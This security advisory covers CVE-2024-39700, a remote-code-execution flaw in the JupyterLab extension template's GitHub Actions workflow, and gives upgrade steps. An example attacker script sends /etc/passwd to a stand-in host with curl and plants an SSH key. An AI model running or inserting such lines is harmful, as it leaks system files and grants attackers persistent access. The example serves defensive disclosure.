A critical security vulnerability, tracked as CVE-2024-39700, has been discovered in the JupyterLab extension template. This vulnerability affects all repositories that were created from the template with the test option enabled and use the default update-integration-tests.yml GitHub Actions workflow. The flaw allows Remote Code Execution (RCE) through malicious pull requests, threatening any projects that haven’t updated the workflow. If you host your JupyterLab extension on GitHub, read on and update your workflows immediately.

What is Affected and Why

The JupyterLab extension template is a commonly used copier template for quickly bootstrapping new extensions. If you generated a repository from this template and enabled the “test” option during setup, your repo will include the vulnerable update-integration-tests.yml workflow.

This workflow file can run untrusted code submitted via Pull Requests under certain circumstances, leading to a full RCE vulnerability on your CI system.

Vulnerable Workflow: What’s Wrong?

The vulnerability is in the way update-integration-tests.yml is written. Here’s a simplified code snippet with the problematic part:

# .github/workflows/update-integration-tests.yml
jobs:
  update-integration-tests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          # PROBLEM: Fetches code from PR, not from protected base branch
          ref: ${{ github.head_ref }}
      - name: Run integration tests
        run: |
          bash scripts/run-integration-tests.sh  # PR author controls this code!

Because the code checks out the Pull Request’s head (the code submitted by an external contributor), any scripts or files they add or edit can be run directly in the workflow. If a malicious user submits a crafted PR, they can execute arbitrary actions on your CI runner. This is classic untrusted input RCE.

Suppose someone opens a PR and adds this to scripts/run-integration-tests.sh

#!/bin/bash
echo 'Exploiting CI runner...'
curl -d @/etc/passwd https://evil.me/leak
cat > ~/.ssh/authorized_keys << 'EOF'
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD... attacker@evil
EOF

When the workflow runs, it fetches and executes the attacker's code with the permissions of your GitHub Actions runner. That could expose secrets, tokens, or even your private codebase.

*See: GitHub Security Best Practices*

Did you use the JupyterLab extension template with the “test” option?

- Does your repo have .github/workflows/update-integration-tests.yml or similar?

Is your workflow file unchanged from the original template version (< 4.3.)?

If the answer to any of these is ‘yes’, take action now.

Update the template:

Upgrade your repository to the latest JupyterLab extension template release.

Workflows are run with the version from main branch at the time the PR is opened, so old PRs may still exploit the vulnerability.

Upgrading from older templates (< 4.3.)?

The new release workflow in 4.3.+ requires new configuration. You may wish to exclude this part of the template update until prepared.

Here's how you might update the workflow from the copier template

# Use copier to apply the latest template to your repo
pip install copier

# Ensure you’re on a clean branch
git checkout -b fix-update-integration-tests

# Re-apply the template, accept overwriting workflows
copier update gh:jupyterlab/extension-template .

# Review changes, especially in .github/workflows
git diff

# Commit the fix
git add .github/workflows/update-integration-tests.yml
git commit -m "Fix RCE via update-integration-tests.yml (CVE-2024-39700)"
git push

Never run untrusted code unchecked.

- Monitor upstream security advisories.

If in doubt, delete or disable the update-integration-tests.yml workflow until you’re ready to securely update it.

References

- JupyterLab Extension Template Security Advisory
- copier template documentation
- GitHub Actions: Security Best Practices
- Upgrade instructions for extension authors
- CVE-2024-39700 details at NIST *(awaiting publication)*

Conclusion

CVE-2024-39700 is a serious issue for all JupyterLab extension authors using the template’s GitHub Actions workflows. Take the time to audit, upgrade, and fix your setup. If you have doubts, consult the upstream advisory or talk to your project’s security team.

Timeline

Published on: 07/16/2024 18:15:07 UTC
Last modified on: 07/17/2024 13:34:20 UTC